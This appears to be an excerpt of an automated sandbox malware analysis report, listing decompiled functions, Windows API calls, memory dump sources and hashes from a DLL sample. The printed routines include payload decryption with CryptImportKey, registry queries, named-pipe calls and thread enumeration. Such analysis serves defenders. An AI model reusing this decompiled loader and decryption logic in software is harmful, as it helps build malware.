                			E01C17BA0() {

				E01C17D66(0x1c192c4, 0x1c1a110); // executed
				goto __eax;
			}



                0x01c17bb2
                0x01c17bb9

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 01C17BB2
                  • Part of subcall function 01C17D66: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01C17DDF
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: ExceptionHelper2@8LoadRaise___delay
                • String ID:
                • API String ID: 123106877-0
                • Opcode ID: f360f31359413ef31553832322506db2cffde90b61f9ca792a3ef7abbd064519
                • Instruction ID: 71f11453fa07baa589dca5024a8988f13b3728b61efcc34f1b095955ba86e880
                • Opcode Fuzzy Hash: f360f31359413ef31553832322506db2cffde90b61f9ca792a3ef7abbd064519
                • Instruction Fuzzy Hash: D0B012C27DD602FC312431525C02C37210CF1D3E21330441EF001D028CE440CD053032
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C17BBB Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E01C17BBB() {

				E01C17D66(0x1c192c4, 0x1c1a12c); // executed
				goto __eax;
			}



                0x01c17bb2
                0x01c17bb9

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 01C17BB2
                  • Part of subcall function 01C17D66: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01C17DDF
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: ExceptionHelper2@8LoadRaise___delay
                • String ID:
                • API String ID: 123106877-0
                • Opcode ID: 905825a9ebcbe2b60df690f5a347800690506e3742a9c6a87095475f166ef267
                • Instruction ID: 0f9744b6ef40154ed56e9dc5da87cb90453e5dc8252fdfe4a0501a6c8839dcf6
                • Opcode Fuzzy Hash: 905825a9ebcbe2b60df690f5a347800690506e3742a9c6a87095475f166ef267
                • Instruction Fuzzy Hash: 7EB012C22D9202EC311471961C01C37215CD2C3E10330801FF500C134CE540CD053032
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C17C84 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E01C17C84() {

				E01C17D66(0x1c19344, 0x1c1a140); // executed
				goto __eax;
			}



                0x01c17c96
                0x01c17c9d

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 01C17C96
                  • Part of subcall function 01C17D66: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01C17DDF
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: ExceptionHelper2@8LoadRaise___delay
                • String ID:
                • API String ID: 123106877-0
                • Opcode ID: bb3db8ddd98d1dee9913f5fbb1c33431b9cf360bde21fb2ebd8bb7b280af33dc
                • Instruction ID: ea399097cfd95d39f6475d7195daf7952e866a77ecf2bcb17551f814ceb95c17
                • Opcode Fuzzy Hash: bb3db8ddd98d1dee9913f5fbb1c33431b9cf360bde21fb2ebd8bb7b280af33dc
                • Instruction Fuzzy Hash: B9B012D22D920AFC321422471E16C36110CD1C3E20370412EF001C514CD450CD013033
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C17C9F Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E01C17C9F() {

				E01C17D66(0x1c19344, 0x1c1a150); // executed
				goto __eax;
			}



                0x01c17c96
                0x01c17c9d

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 01C17C96
                  • Part of subcall function 01C17D66: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01C17DDF
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: ExceptionHelper2@8LoadRaise___delay
                • String ID:
                • API String ID: 123106877-0
                • Opcode ID: b340dce6815a7326c11aace9d865e1dba27b89d7db8a9810e34cbf35489c9d31
                • Instruction ID: c07a21b98d8281882e979cc362b3f3dbbf7c541f2bc78aee10395462007b38ad
                • Opcode Fuzzy Hash: b340dce6815a7326c11aace9d865e1dba27b89d7db8a9810e34cbf35489c9d31
                • Instruction Fuzzy Hash: EDB012C22D9202EC321462861C16C36114CD1C7E20370942EF000C634CD450CC053032
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C12114 Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E01C12114(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x1c1a290, 0, _a4); // executed
				return _t2;
			}




                0x01c12120
                0x01c12126

                APIs
                • RtlAllocateHeap.NTDLL(00000000,00000000,01C16F72), ref: 01C12120
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: e4cb84a49c9de5855ec234e717433cf5db820b4f1e16417ce1f475dd23abf1d6
                • Instruction ID: 26c13dea28616ed57f45b0f80f439cfee4a93d6c3750d1ae66d1be031faa36c2
                • Opcode Fuzzy Hash: e4cb84a49c9de5855ec234e717433cf5db820b4f1e16417ce1f475dd23abf1d6
                • Instruction Fuzzy Hash: B4B01231095110AFCA228B00DD04F057B32B775B00F108010B20A01068C232C420EB08
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C57E0 Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                Download Yara Rule
                APIs
                • RtlFreeHeap.NTDLL(00000000,?,046C222D,?,?,?,?,?,?,?,?,046C1089,?,?,?), ref: 046C57EC
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: FreeHeap
                • String ID:
                • API String ID: 3298025750-0
                • Opcode ID: 7a751642ad8270727b6874cb65d8f4ef364745ed4b88b1c1e96bc3b4379e9cb0
                • Instruction ID: f484026df18f1ce1534cd110e258c9325ab986cf6f2a952ce4ce9c1122f34c7e
                • Opcode Fuzzy Hash: 7a751642ad8270727b6874cb65d8f4ef364745ed4b88b1c1e96bc3b4379e9cb0
                • Instruction Fuzzy Hash: 5DB01235040200EFDB019B01DD04F057AA1F790700F105020B2041A460D2360C70FF24
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C8F9E Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                Download Yara Rule
                APIs
                • RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: dccf6220b00aaf6ec82b728f6a48c74d3e347fb1cc8297f4deba6029d48d9744
                • Instruction ID: 39f90e1936043cbe138a3e435c2dde8eb37ce7b8e80d839508a3de1775713379
                • Opcode Fuzzy Hash: dccf6220b00aaf6ec82b728f6a48c74d3e347fb1cc8297f4deba6029d48d9744
                • Instruction Fuzzy Hash: 8DB01235000300ABDB11DB01ED04F067BA1E790700F005420B20859060D3361C74EF34
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C124F7 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E01C124F7(intOrPtr* __eax, void* __ecx, void* __edx, void* _a4, void** _a8) {
				void* _v8;
				int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v144;
				int _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				char _v164;
				void* _t37;
				void* _t42;
				void* _t51;
				int _t53;
				void* _t60;
				void* _t63;
				void* _t64;

				_t53 = 0;
				_t60 = __ecx;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(__ecx <= 0x80 ||  *__eax != 0x400) {
					L21:
					return _t53;
				} else {
					_t58 =  &_v164;
					_t37 = E01C12B0C(__eax, __edx,  &_v164,  &_v16, _a4 + __ecx - 0x80);
					if(_t37 != 0) {
						goto L21;
					}
					_t61 = _t60 - 0x80;
					if(_v148 > _t60 - 0x80) {
						goto L21;
					}
					while( *((intOrPtr*)(_t64 + _t37 - 0x8c)) == _t53) {
						_t37 = _t37 + 1;
						if(_t37 < 0x10) {
							continue;
						}
						_t53 = _v148;
						_t51 = E01C12114(_t53);
						_t73 = _t51;
						_v8 = _t51;
						if(_t51 != 0) {
							_t53 = 0;
							L18:
							if(_t53 != 0) {
								goto L21;
							}
							L19:
							if(_v8 != 0) {
								E01C12C11(_v8);
							}
							goto L21;
						}
						memcpy(_t51, _a4, _t53);
						L8:
						_t63 = _v8;
						E01C15374(_t58, _t73, _t63, _t53,  &_v32);
						if(_v32 != _v164 || _v28 != _v160 || _v24 != _v156 || _v20 != _v152) {
							L15:
							_t53 = 0;
							goto L19;
						} else {
							 *_a8 = _t63;
							goto L18;
						}
					}
					_t58 =  &_v144;
					_t42 = E01C178F2(_t61 & 0xfffffff0, 0,  &_v144, _a4,  &_v8,  &_v12); // executed
					__eflags = _t42;
					if(_t42 != 0) {
						_t53 = _v12;
						goto L18;
					}
					_t53 = _v148;
					__eflags = _v12 - _t53;
					if(__eflags >= 0) {
						goto L8;
					}
					goto L15;
				}
			}























                0x01c12502
                0x01c12505
                0x01c1250e
                0x01c12511
                0x01c12514
                0x01c12517
                0x01c12613
                0x01c12617
                0x01c12529
                0x01c12535
                0x01c1253c
                0x01c12543
                0x00000000
                0x00000000
                0x01c12549
                0x01c12551
                0x00000000
                0x00000000
                0x01c12557
                0x01c12560
                0x01c12564
                0x00000000
                0x00000000
                0x01c12566
                0x01c1256d
                0x01c12572
                0x01c12574
                0x01c12577
                0x01c125f8
                0x01c125ff
                0x01c12601
                0x00000000
                0x00000000
                0x01c12603
                0x01c12607
                0x01c1260c
                0x01c1260c
                0x00000000
                0x01c12607
                0x01c1257e
                0x01c12586
                0x01c12586
                0x01c1258f
                0x01c1259d
                0x01c125f4
                0x01c125f4
                0x00000000
                0x01c125c0
                0x01c125c3
                0x00000000
                0x01c125c3
                0x01c1259d
                0x01c125d2
                0x01c125e0
                0x01c125e5
                0x01c125e7
                0x01c125fc
                0x00000000
                0x01c125fc
                0x01c125e9
                0x01c125ef
                0x01c125f2
                0x00000000
                0x00000000
                0x00000000
                0x01c125f2

                APIs
                • memcpy.NTDLL(00000000,?,?,?,?,01C17307,00000001,?,?,01C17307), ref: 01C1257E
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: memcpy
                • String ID:
                • API String ID: 3510742995-0
                • Opcode ID: b2e9ab7f748de7610b934f7e3a7f46cbb3514406687df12c621ed21e5053afa3
                • Instruction ID: c507be93563b7f651a688a1a5e3916ec1e3cdec0d4a9fe1e00d41de7e06d1fa4
                • Opcode Fuzzy Hash: b2e9ab7f748de7610b934f7e3a7f46cbb3514406687df12c621ed21e5053afa3
                • Instruction Fuzzy Hash: 6C316F75940219EFDF21DEA8C9D0AADB778BB46204F2044A9E605A7185D630DF85EF20
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046DC3B1 Relevance: 1.3, APIs: 1, Instructions: 63memoryCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046CBC31: RegQueryValueExA.KERNELBASE(?,046DE5BD,00000000,046DE5BD,00000000,046D6019,00000003,00000000,?,00000000,?,046DE5BD,046DE5BD,?,046D6019,00000000), ref: 046CBC69
                  • Part of subcall function 046CBC31: RtlAllocateHeap.NTDLL(00000000,046D6019), ref: 046CBC7D
                  • Part of subcall function 046CBC31: RegQueryValueExA.ADVAPI32(?,046DE5BD,00000000,046DE5BD,00000000,046D6019,?,046D6019,00000000,046DE5BD,?,?,?,046DE5BD,?), ref: 046CBC97
                  • Part of subcall function 046CBC31: RegCloseKey.ADVAPI32(?,?,046D6019,00000000,046DE5BD,?,?,?,046DE5BD,?,?,?,00000000,?,?,?), ref: 046CBCC1
                • HeapFree.KERNEL32(00000000,?,?,?,?,?,74E5F710,00000000,00000000,?,?,?,046D2C46,?), ref: 046DC443
                  • Part of subcall function 046C57A1: memcpy.NTDLL(?,?,00000000,?,?,?,?,?,?,046DC3FA,?,00000001,?,?,?,?), ref: 046C57C4
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: HeapQueryValue$AllocateCloseFreememcpy
                • String ID:
                • API String ID: 1301464996-0
                • Opcode ID: 19bfab9528e30f2f563736f1b1e14066feae3fe3e68f45bf84c580c5ebdb4be4
                • Instruction ID: e1b9e39028c4d57ef5cc7ba44daf3777d4c2552b7a0f521337b7f5fbd8feaad3
                • Opcode Fuzzy Hash: 19bfab9528e30f2f563736f1b1e14066feae3fe3e68f45bf84c580c5ebdb4be4
                • Instruction Fuzzy Hash: 58118C75A90309EFDB149F9ADC90EB977A8EB98204F500029E6029B240F675BD01DB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D0AF6 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                Download Yara Rule
                APIs
                • memcpy.NTDLL(?,046EE3A4,00000018,046CAA0D,04C98E36,?,046CAA0D,04C98E36,?,046CAA0D,04C98E36,?,?,?,?,046CAA0D), ref: 046D0BAB
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: memcpy
                • String ID:
                • API String ID: 3510742995-0
                • Opcode ID: 782c0ced67d9590cb07f6ed3012636709a9d20cc01dbc84226c0118056f69c69
                • Instruction ID: dc1c9f09e8a4dbd521e3fba0045e92bfc30375b39ea718a445b9121654fa861b
                • Opcode Fuzzy Hash: 782c0ced67d9590cb07f6ed3012636709a9d20cc01dbc84226c0118056f69c69
                • Instruction Fuzzy Hash: 01118E71A45505AFDB14DF16EC49CA63BE5EB90718B04A12AE40D8F2A5F737BC40CF61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C9D25 Relevance: 1.3, APIs: 1, Instructions: 50memoryCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046CBC31: RegQueryValueExA.KERNELBASE(?,046DE5BD,00000000,046DE5BD,00000000,046D6019,00000003,00000000,?,00000000,?,046DE5BD,046DE5BD,?,046D6019,00000000), ref: 046CBC69
                  • Part of subcall function 046CBC31: RtlAllocateHeap.NTDLL(00000000,046D6019), ref: 046CBC7D
                  • Part of subcall function 046CBC31: RegQueryValueExA.ADVAPI32(?,046DE5BD,00000000,046DE5BD,00000000,046D6019,?,046D6019,00000000,046DE5BD,?,?,?,046DE5BD,?), ref: 046CBC97
                  • Part of subcall function 046CBC31: RegCloseKey.ADVAPI32(?,?,046D6019,00000000,046DE5BD,?,?,?,046DE5BD,?,?,?,00000000,?,?,?), ref: 046CBCC1
                • HeapFree.KERNEL32(00000000,00000000,00000000,046EE21C,?,00000000,?,?,?,00000000,046D4935,046E3A35,00000000,00000000), ref: 046C9D96
                  • Part of subcall function 046CFF8B: StrChrA.SHLWAPI(046EE21C,0000002E,00000000,00000000,?,046EE21C,046D739D,00000000,00000000,00000000), ref: 046CFF9D
                  • Part of subcall function 046CFF8B: StrChrA.SHLWAPI(00000004,00000020,?,046EE21C,046D739D,00000000,00000000,00000000), ref: 046CFFAC
                  • Part of subcall function 046E0929: CloseHandle.KERNEL32(00000001,?,00000000,00000000,00000000,00000000,00000000,74E5F5B0,046D47CC,?,00000001), ref: 046E094F
                  • Part of subcall function 046E0929: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 046E095B
                  • Part of subcall function 046E0929: GetModuleHandleA.KERNEL32(?,04C9978E,?,00000000,00000000), ref: 046E097B
                  • Part of subcall function 046E0929: GetProcAddress.KERNEL32(00000000), ref: 046E0982
                  • Part of subcall function 046E0929: Thread32First.KERNEL32(00000001,0000001C), ref: 046E0992
                  • Part of subcall function 046E0929: CloseHandle.KERNEL32(00000001), ref: 046E09DA
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CloseHandle$HeapQueryValue$AddressAllocateCreateFirstFreeModuleProcSnapshotThread32Toolhelp32
                • String ID:
                • API String ID: 2627809124-0
                • Opcode ID: 2b8d6ad0d122aa76c74f2762fcc2fd831197b4366ad4fb9268458fce24efd2a2
                • Instruction ID: c6b08e7c070320635860c3ac6e3af45a484d786e0dcd6f48b20def953646c6db
                • Opcode Fuzzy Hash: 2b8d6ad0d122aa76c74f2762fcc2fd831197b4366ad4fb9268458fce24efd2a2
                • Instruction Fuzzy Hash: 26017CB1614118BFEB05EBAAED84CAFB7EDEB44348700105AF501A7201F636BE04CB74
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D7341 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046CBC31: RegQueryValueExA.KERNELBASE(?,046DE5BD,00000000,046DE5BD,00000000,046D6019,00000003,00000000,?,00000000,?,046DE5BD,046DE5BD,?,046D6019,00000000), ref: 046CBC69
                  • Part of subcall function 046CBC31: RtlAllocateHeap.NTDLL(00000000,046D6019), ref: 046CBC7D
                  • Part of subcall function 046CBC31: RegQueryValueExA.ADVAPI32(?,046DE5BD,00000000,046DE5BD,00000000,046D6019,?,046D6019,00000000,046DE5BD,?,?,?,046DE5BD,?), ref: 046CBC97
                  • Part of subcall function 046CBC31: RegCloseKey.ADVAPI32(?,?,046D6019,00000000,046DE5BD,?,?,?,046DE5BD,?,?,?,00000000,?,?,?), ref: 046CBCC1
                • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00000000,046D4930,046E3A35,00000000,00000000), ref: 046D73B7
                  • Part of subcall function 046CFF8B: StrChrA.SHLWAPI(046EE21C,0000002E,00000000,00000000,?,046EE21C,046D739D,00000000,00000000,00000000), ref: 046CFF9D
                  • Part of subcall function 046CFF8B: StrChrA.SHLWAPI(00000004,00000020,?,046EE21C,046D739D,00000000,00000000,00000000), ref: 046CFFAC
                  • Part of subcall function 046CB823: lstrlen.KERNEL32(046C1127,?,00000000,00000000,046C2C06,00000011,046C1127,00000001,00000000,?,-00000008,?,046C1127,00000000,?,?), ref: 046CB853
                  • Part of subcall function 046CB823: RtlAllocateHeap.NTDLL(00000000,-00000008,?), ref: 046CB869
                  • Part of subcall function 046CB823: memcpy.NTDLL(00000010,?,00000000), ref: 046CB89F
                  • Part of subcall function 046CB823: memcpy.NTDLL(00000010,00000000,?), ref: 046CB8BA
                  • Part of subcall function 046CB823: CallNamedPipeA.KERNEL32(00000000,-00000008,?,00000010,00000028,00000001), ref: 046CB8D8
                  • Part of subcall function 046CB823: GetLastError.KERNEL32 ref: 046CB8E2
                  • Part of subcall function 046CB823: HeapFree.KERNEL32(00000000,00000000), ref: 046CB905
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$AllocateFreeQueryValuememcpy$CallCloseErrorLastNamedPipelstrlen
                • String ID:
                • API String ID: 730886825-0
                • Opcode ID: cb41af87c14d5f3853f143bd919b9fdac330b1425af006ec01891bbc044db1f2
                • Instruction ID: 82569582667e4e52d9b06861b791e09d4b816b6068af5b3ac5e25b88952f8869
                • Opcode Fuzzy Hash: cb41af87c14d5f3853f143bd919b9fdac330b1425af006ec01891bbc044db1f2
                • Instruction Fuzzy Hash: 51015E71950204FFEB11DB95DD0AF9A77ECEB45714F100069F601AB280F675BE00D766
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D5E07 Relevance: 1.3, APIs: 1, Instructions: 45COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • memset.NTDLL ref: 046D5E25
                  • Part of subcall function 046C3B19: memset.NTDLL ref: 046C3B3F
                  • Part of subcall function 046C3B19: memcpy.NTDLL ref: 046C3B67
                  • Part of subcall function 046C3B19: GetLastError.KERNEL32(00000010,00000218,046E6D9D,00000100,?,00000318,00000008), ref: 046C3B7E
                  • Part of subcall function 046C3B19: GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,046E6D9D,00000100), ref: 046C3C61
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: ErrorLastmemset$AllocateHeapmemcpy
                • String ID:
                • API String ID: 4290293647-0
                • Opcode ID: 58fa3e1844877e0bb56c8be9a8980e543865f8c9ea10c76ff56b2ce295575133
                • Instruction ID: fa90c566fde0c26893d287021fa6229e258db684ca5613a4467630a08596ca5f
                • Opcode Fuzzy Hash: 58fa3e1844877e0bb56c8be9a8980e543865f8c9ea10c76ff56b2ce295575133
                • Instruction Fuzzy Hash: B701AD30A013186BD721AF2ADC40FAB7BE8EF45758F00882EFD4596640E3B1F9448AE4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C11628 Relevance: 1.3, APIs: 1, Instructions: 36stringCOMMON
                Download Yara Rule
                C-Code - Quality: 75%
                			E01C11628(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t13;
				void* _t21;

				_t11 =  &_a4;
				_t21 = 0;
				__imp__( &_a8);
				_t13 = E01C178F2( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
				if(_t13 == 0) {
					_t21 = E01C12114(_a8 + _a8);
					if(_t21 != 0) {
						E01C14AF1(_a4, _t21, _t23);
					}
					E01C12C11(_a4);
				}
				return _t21;
			}





                0x01c11630
                0x01c11637
                0x01c11639
                0x01c11648
                0x01c1164f
                0x01c1165e
                0x01c11662
                0x01c11669
                0x01c11669
                0x01c11671
                0x01c11676
                0x01c1167b

                APIs
                • lstrlen.KERNEL32(?,?,?,00000000,?,01C15328,00000000,?,?,?,01C17675,?,021795B0), ref: 01C11639
                  • Part of subcall function 01C178F2: CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000018,F0000000,?,00000110,01C17307), ref: 01C1792A
                  • Part of subcall function 01C178F2: memcpy.NTDLL(?,01C17307,00000010,?,?,?,?,?,?,?,?,?,?,01C11ACD,00000000,01C14F92), ref: 01C17943
                  • Part of subcall function 01C178F2: CryptImportKey.ADVAPI32(00000000,?,0000001C,00000000,00000000,?), ref: 01C1796C
                  • Part of subcall function 01C178F2: CryptSetKeyParam.ADVAPI32(?,00000001,?,00000000), ref: 01C17984
                  • Part of subcall function 01C178F2: memcpy.NTDLL(00000000,01C14F92,01C17307,0000011F), ref: 01C179D6
                  • Part of subcall function 01C12114: RtlAllocateHeap.NTDLL(00000000,00000000,01C16F72), ref: 01C12120
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                • String ID:
                • API String ID: 894908221-0
                • Opcode ID: 82331c8af34ecdfbe3fdba9db800ebcd380e95bf2fe1135f4d7be20adb5185e0
                • Instruction ID: 1889dd6ac20cd006c1477afaaccd50fc4bc2604ba9bb6585a4cab55c235641a2
                • Opcode Fuzzy Hash: 82331c8af34ecdfbe3fdba9db800ebcd380e95bf2fe1135f4d7be20adb5185e0
                • Instruction Fuzzy Hash: 1FF03036140109FADF11AE65DC40CDE3BADEF97650B058011FE098A014DA76DA55B7A0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C14F81 Relevance: 1.3, APIs: 1, Instructions: 23COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E01C14F81(void* __edi, void* _a4) {
				int _t7;
				int _t12;

				_t7 = E01C11A55(__edi, _a4,  &_a4); // executed
				_t12 = _t7;
				if(_t12 != 0) {
					memcpy(__edi, _a4, _t12);
					 *((char*)(__edi + _t12)) = 0;
					E01C12C11(_a4);
				}
				return _t12;
			}





                0x01c14f8d
                0x01c14f92
                0x01c14f96
                0x01c14f9d
                0x01c14fa8
                0x01c14fac
                0x01c14fac
                0x01c14fb5

                APIs
                  • Part of subcall function 01C11A55: memcpy.NTDLL(00000000,00000110,?,?,?,?,01C14F92,?,01C17307,01C17307,?), ref: 01C11A8B
                  • Part of subcall function 01C11A55: memset.NTDLL ref: 01C11B00
                  • Part of subcall function 01C11A55: memset.NTDLL ref: 01C11B14
                • memcpy.NTDLL(?,01C17307,00000000,?,01C17307,01C17307,?,?,01C17307,?), ref: 01C14F9D
